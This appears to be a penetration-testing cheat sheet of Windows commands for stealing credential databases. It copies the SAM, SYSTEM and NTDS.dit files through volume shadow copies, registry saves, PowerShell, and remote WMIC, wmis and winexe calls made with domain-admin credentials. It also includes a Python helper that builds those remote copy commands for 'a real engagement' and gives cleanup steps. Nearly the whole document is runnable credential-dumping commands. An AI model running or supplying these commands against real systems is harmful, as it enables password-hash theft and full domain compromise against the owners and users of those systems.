Useful Commands - Windows

Save SAM database

Get SAM via cmd.exe:

vssadmin create shadow /for=c:
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_list_shadows>\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy<#_from_list_shadows>\windows\system32\config\SAM .

Get SAM via registry:

reg save hklm\sam SAM
reg save hklm\system SYSTEM

Get SAM via PowerShell (one statement per line; the original one-liner was run together and had a stray backtick before cmd):

$service = Get-Service -Name VSS
if ($service.Status -ne "Running") { $notrunning = 1; $service.Start() }
$id = (gwmi -List Win32_ShadowCopy).Create("C:\", "ClientAccessible").ShadowID
$volume = gwmi Win32_ShadowCopy -Filter "ID='$id'"
# SYSTEM is needed too: the SAM hashes are encrypted with the boot key held in it
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SYSTEM" \
cmd /c copy "$($volume.DeviceObject)\windows\system32\config\SAM" \
$volume.Delete(); if ($notrunning -eq 1) { $service.Stop() }

Via WMIC (remote):

C:\> net use \\DC1 /user:DOMAIN\domain_admin domainadminpassword
C:\> dir \\DC1\C$
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c vssadmin create shadow /for=C: > C:\temp\vssadmin.txt 2>&1"
C:\> type \\DC1\C$\temp\vssadmin.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c vssadmin list shadows > C:\temp\vssadmin.txt 2>&1"
C:\> type \\DC1\C$\temp\vssadmin.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM.hive > C:\temp\system.txt 2>&1"
C:\> type \\DC1\C$\temp\system.txt
C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM.hive > C:\temp\sam.txt 2>&1"
C:\> type \\DC1\C$\temp\sam.txt

Notes: wmic process call create only starts the process on DC1, so everything it writes lands on DC1 (C:\temp must already exist there) and is read back through the C$ share; the redirection must be "> file 2>&1" (with "2>&1 > file" stderr goes to the invisible console instead of the file); replace HarddiskVolumeShadowCopy1 with the "Shadow Copy Volume" value printed by vssadmin list shadows, which is not necessarily 1 if shadows already existed. Pull the hives back with copy \\DC1\C$\temp\SAM.hive . and copy \\DC1\C$\temp\SYSTEM.hive . and remove C:\temp\*.hive plus the shadow copy (vssadmin delete shadows /shadow=<ID>) when done.

Save NTDS.DIT database

For NTDS.DIT (same WMIC pattern; the shadow copy number again comes from vssadmin list shadows, and the SYSTEM hive from the same shadow copy is needed to decrypt it):

C:\> wmic /node:DC1 /user:DOMAIN\domain_admin /password:domainadminpassword process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1"
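The cmd.exe, WMIC and NTDS.DIT steps above all depend on reading the right "Shadow Copy Volume" out of vssadmin list shadows instead of hard-coding HarddiskVolumeShadowCopy1 or 2. The following Python is an added example, not part of this cheat sheet: it parses a constructed copy of that output (made-up GUIDs and host name, real layout), picks the newest shadow of C:, and builds the copy and wmic lines used on this page. The timestamp format is assumed to be the US locale that vssadmin prints on an English system.

```python
import re
from datetime import datetime

# Constructed sample of `vssadmin list shadows` output with two shadow copies of C:.
# The layout mirrors the real command; the GUIDs and host name are made up.
SAMPLE_VSSADMIN_OUTPUT = r"""vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Contents of shadow copy set ID: {1a2b3c4d-0000-4000-8000-000000000001}
   Contained 1 shadow copies at creation time: 1/2/2024 10:15:32 AM
      Shadow Copy ID: {aaaa0000-0000-4000-8000-000000000001}
         Original Volume: (C:)\\?\Volume{c0000000-0000-0000-0000-000000000000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
         Originating Machine: DC1.example.local
         Service Machine: DC1.example.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential

Contents of shadow copy set ID: {1a2b3c4d-0000-4000-8000-000000000002}
   Contained 1 shadow copies at creation time: 1/3/2024 09:01:05 AM
      Shadow Copy ID: {aaaa0000-0000-4000-8000-000000000002}
         Original Volume: (C:)\\?\Volume{c0000000-0000-0000-0000-000000000000}\
         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2
         Originating Machine: DC1.example.local
         Service Machine: DC1.example.local
         Provider: 'Microsoft Software Shadow Copy provider 1.0'
         Type: ClientAccessible
         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential
"""

# Paths of the wanted files relative to the root of the shadow copy.
HIVES = {
    "SYSTEM": r"Windows\System32\config\SYSTEM",
    "SAM": r"Windows\System32\config\SAM",
    "NTDS": r"Windows\NTDS\NTDS.dit",
}


def parse_shadows(text):
    """Return one dict per shadow copy: id, created, original_volume, shadow_volume, machine."""
    shadows, current, created = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        m = re.match(r"Contained \d+ shadow copies at creation time: (.+)$", line)
        if m:
            created = m.group(1).strip()      # applies to every copy in this set
            continue
        if line.startswith("Shadow Copy ID:"):
            current = {"id": line.split(":", 1)[1].strip(), "created": created}
            shadows.append(current)
            continue
        if current is None:
            continue
        for key, field in (("Original Volume:", "original_volume"),
                           ("Shadow Copy Volume:", "shadow_volume"),
                           ("Originating Machine:", "machine")):
            if line.startswith(key):
                current[field] = line[len(key):].strip()
    return shadows


def drive_letter(original_volume):
    """Extract the drive letter, e.g. 'C:', from the 'Original Volume' field."""
    m = re.match(r"\(([A-Za-z]:)\)", original_volume)
    return m.group(1).upper() if m else None


def _created_key(shadow):
    # vssadmin prints the timestamp in the host's locale; this assumes the US format
    # ("1/3/2024 09:01:05 AM"). Unparseable timestamps sort first so they are never preferred.
    try:
        return datetime.strptime(shadow["created"], "%m/%d/%Y %I:%M:%S %p")
    except (TypeError, ValueError):
        return datetime.min


def newest_shadow_for(shadows, drive="C:"):
    """Pick the most recently created shadow copy of the given drive, or None."""
    matches = [s for s in shadows
               if drive_letter(s.get("original_volume", "")) == drive.upper()]
    return max(matches, key=_created_key) if matches else None


def copy_commands(shadow_volume, dest_dir=r"C:\temp", names=("SYSTEM", "SAM")):
    """Build the cmd.exe copy lines for the wanted files from a shadow copy device."""
    cmds = []
    for name in names:
        dest_name = "NTDS.dit" if name == "NTDS" else name + ".hive"
        cmds.append("copy %s\\%s %s\\%s" % (shadow_volume, HIVES[name], dest_dir, dest_name))
    return cmds


def wmic_command(host, user, password, inner, log):
    """Wrap a cmd line in the wmic process-create call used above, logging stdout and stderr."""
    return ('wmic /node:%s /user:%s /password:%s process call create '
            '"cmd /c %s > %s 2>&1"' % (host, user, password, inner, log))


if __name__ == "__main__":
    shadows = parse_shadows(SAMPLE_VSSADMIN_OUTPUT)
    newest = newest_shadow_for(shadows, "C:")
    print("using", newest["shadow_volume"], "created", newest["created"])
    for cmd in copy_commands(newest["shadow_volume"], names=("SYSTEM", "SAM", "NTDS")):
        print(wmic_command("DC1", r"DOMAIN\domain_admin", "domainadminpassword",
                           cmd, r"C:\temp\output.txt"))
```

On a real engagement feed it the text of \\DC1\C$\temp\vssadmin.txt instead of the constructed sample; the output lines can be pasted straight into the WMIC session above.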

Remotely get NTDS.DIT via Kali:

apt-get install libgnutls26 wmis -y
wmis -U 'DOMAIN\domain_admin%domainadminpassword' //DC1 'cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit > C:\temp\output.txt 2>&1'
wmis -U 'DOMAIN\domain_admin%domainadminpassword' //DC1 'cmd.exe /c type C:\temp\output.txt'

The single quotes matter: unquoted, the Kali shell strips the backslashes and applies the redirection locally instead of on DC1. wmis only starts the process and does not return its output, so read C:\temp\output.txt and fetch NTDS.dit (plus the SYSTEM hive) over SMB, e.g. smbclient //DC1/C$ -U 'DOMAIN\domain_admin'.

Use winexe to execute a command on Windows remotely

winexe -U "username%password" //10.10.10.10 'wmic bios get serialnumber'